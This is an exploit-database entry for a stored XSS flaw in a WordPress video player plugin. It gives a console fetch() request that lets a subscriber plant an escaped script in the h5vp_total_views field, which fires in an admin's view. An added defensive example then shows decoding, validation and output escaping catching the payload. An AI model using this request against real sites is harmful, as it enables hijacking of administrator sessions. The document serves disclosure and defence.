## https://sploitus.com/exploit?id=WPEX-ID:759B3866-C619-42CC-94A8-0AF6D199CC81
Run the following command in the browser's developer console while logged in to the blog as a subscriber user (`id=14` is the ID of an existing video player created by the plugin):
```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=h5vp_import_data&id=14&content={\"h5vp_total_views\":\"\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\\u003b\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\"}",
  "method": "POST",
}).then((response) => { return response.text(); }).then((data) => { console.log(data); })
```
The XSS is triggered when an admin views the player list (i.e. https://example.com/wp-admin/edit.php?post_type=videoplayer).
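The following is an added example, not code from the plugin or from the original page: it shows why a filter that pattern-matches the raw request body misses this request (the markup is hidden behind JSON `\uXXXX` escapes), and how decoding first, validating the field, and encoding on output each catch it. Assumptions: `h5vp_total_views` is meant to be an integer counter (inferred from its name), and the function names `naiveRawMatch`, `inspectImport`, `escapeHtml` and `storedValue` are hypothetical.

```javascript
// Added example, not plugin code. Sample bodies are constructed from the request shown above.
const SAMPLE_BODY = String.raw`action=h5vp_import_data&id=14&content={"h5vp_total_views":"\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e"}`;
const BENIGN_BODY = 'action=h5vp_import_data&id=14&content={"h5vp_total_views":"42"}';

// Naive filter: pattern-matches the raw body, so JSON \uXXXX escapes hide the markup.
function naiveRawMatch(body) {
  return /<\s*script/i.test(body);
}

// Decode the form body and the JSON in `content`, then validate each decoded value.
// Assumption: h5vp_total_views is an integer counter (inferred from its name).
function inspectImport(body) {
  const params = new URLSearchParams(body);
  if (params.get("action") !== "h5vp_import_data") return { relevant: false, findings: [] };
  let meta;
  try {
    meta = JSON.parse(params.get("content") ?? "");
  } catch {
    return { relevant: true, findings: ["content: not valid JSON"] };
  }
  if (meta === null || typeof meta !== "object" || Array.isArray(meta)) {
    return { relevant: true, findings: ["content: not a JSON object"] };
  }
  const findings = [];
  for (const [key, value] of Object.entries(meta)) {
    const text = String(value);
    if (key === "h5vp_total_views" && !/^\d+$/.test(text)) findings.push(`${key}: not an integer`);
    if (/[<>]/.test(text)) findings.push(`${key}: markup characters after decoding`);
  }
  return { relevant: true, findings };
}

// Output encoding for the admin list view: a stored value renders as text, not markup.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// The value a handler would store if it JSON-decoded `content` without validation.
function storedValue(body) {
  return JSON.parse(new URLSearchParams(body).get("content")).h5vp_total_views;
}

console.log(naiveRawMatch(SAMPLE_BODY));
console.log(inspectImport(SAMPLE_BODY).findings);
console.log(escapeHtml(storedValue(SAMPLE_BODY)));
```

Input validation and output encoding are independent controls here; the request should also be rejected earlier if the caller lacks the capability to edit the player, which this sketch does not model.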